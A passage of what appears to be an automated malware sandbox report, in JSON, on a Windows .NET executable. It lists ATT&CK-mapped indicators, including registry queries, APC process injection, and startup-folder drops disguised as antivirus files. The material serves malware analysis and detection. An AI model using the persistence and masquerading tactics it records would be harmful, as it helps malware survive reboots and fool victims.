\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: 47:F9:77:BB:69:BA:4B:44:A5:77:26:F5:CD:9C:0A:9A:07:B0:77:44; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Go Daddy Root Certificate Authority - G2, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: 27:AC:93:69:FA:F2:52:07:BB:26:27:CE:FA:CC:BE:4E:F9:C3:19:B8; see report for more information)\n The input sample is signed with a certificate issued by \"OU=Go Daddy Class 2 Certification Authority, O=\"The Go Daddy Group\n Inc.\", C=US\" (SHA1: 34:0B:28:80:F4:46:FC:C0:4E:59:ED:33:F5:2B:3D:08:D6:24:29:64; see report for more information)\n The input sample is signed with a certificate issued by \"OU=Go Daddy Class 2 Certification Authority, O=\"The Go Daddy Group\n Inc.\", C=US\" (SHA1: 27:96:BA:E6:3F:18:01:E2:77:26:1B:A0:D7:77:70:02:8F:20:EE:E4; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: A6:64:9E:2D:CD:D4:5A:90:6C:88:B1:DF:B8:C7:E7:B8:5F:03:8B:73; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US\" (SHA1: 97:D8:C5:70:0F:12:24:6C:88:BC:FA:06:7E:8C:A7:4D:A8:62:67:28; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: 1B:51:1A:BE:AD:59:C6:CE:20:70:77:C0:BF:0E:00:43:B1:38:26:12; see report for more information)\n The input sample is signed with a certificate issued by \"CN=R10, O=Let's Encrypt, C=US\" (SHA1: 06:1D:18:D6:F5:10:B0:6D:B1:F4:F2:9C:42:21:64:39:96:0C:AA:BF; see report for more information)\n The input sample is signed with a certificate issued by \"CN=ISRG Root X1, O=Internet Security Research Group, C=US\" (SHA1: 00:AB:EF:D0:55:F9:A9:C7:84:FF:DE:AB:D1:DC:DD:8F:ED:74:14:36; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xlsrvintl.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67AB4062.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"xlsrvintl.dll\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"DISMHOST.EXE.67AB4062.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"xlsrvintl.dll\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"xlsrvintl.dll\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-140", "type": 13, "relevance": 2, "name": "YARA signature match – Embedded PE executable", "description": "YARA signature matched on embedded PE in file \"sample.bin\"\n YARA signature matched on embedded PE in file \"xlsrvintl.dll.3434588778\"", "origin": "YARA Signature", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"Antivirus.bat\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat]- [targetUID: 00000000-00005932]\n Dropped file: \"YourMom.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs]- [targetUID: 00000000-00005932]\n Dropped file: \"Antivirus3.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs]- [targetUID: 00000000-00005932]\n Dropped file: \"KasperskyScanner.hta\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta]- [targetUID: 00000000-00005932]\n Dropped file: \"Antivirus2.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs]- [targetUID: 00000000-00005932]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"xlsrvintl.dll\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"DISMHOST.EXE.67AB4062.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe.config\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Nominatus_T7fc20cc6#\\\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.INI\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe.Local\\\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\VMware\\\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\VMware\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\hosts\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\lmhosts.sam\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\networks\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\protocol\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\services\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS32.mp3\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"NtQueueApcThread\" (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARMHelper.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Adobe AIR Application Installer.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\Adobe AIR Updater.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\airappinstaller.exe\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" touched file 